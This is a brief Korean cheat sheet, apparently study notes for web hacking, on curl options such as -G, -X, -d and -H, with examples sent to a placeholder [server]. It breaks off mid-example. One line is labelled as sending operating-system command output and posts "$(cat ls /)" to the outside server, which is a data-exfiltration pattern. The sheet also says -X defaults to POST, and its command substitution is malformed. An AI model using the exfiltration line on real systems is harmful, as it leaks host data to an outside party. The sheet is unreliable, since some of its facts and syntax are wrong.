curl
cURL (client URL) 프로토콜들을 이용해 URL로 데이터를 전송하거나 가져올 때 사용 가능 옵션 -G : GET 요청 curl -G https://[server]/?param1=value1¶m2=value2 -X : 요청 method 지정 (default : POST) curl -X GET https://[server]/data -d : POST 데이터 전송 curl http://[server] -d "test" 운영체제 명령어 실행 결과 전송 curl https://[server]/test -d "$(cat ls /)" -H : content-type 지정 폼 데이터 전송 curl https://[server]/test -d "param1=value1" -H "Content-Type:..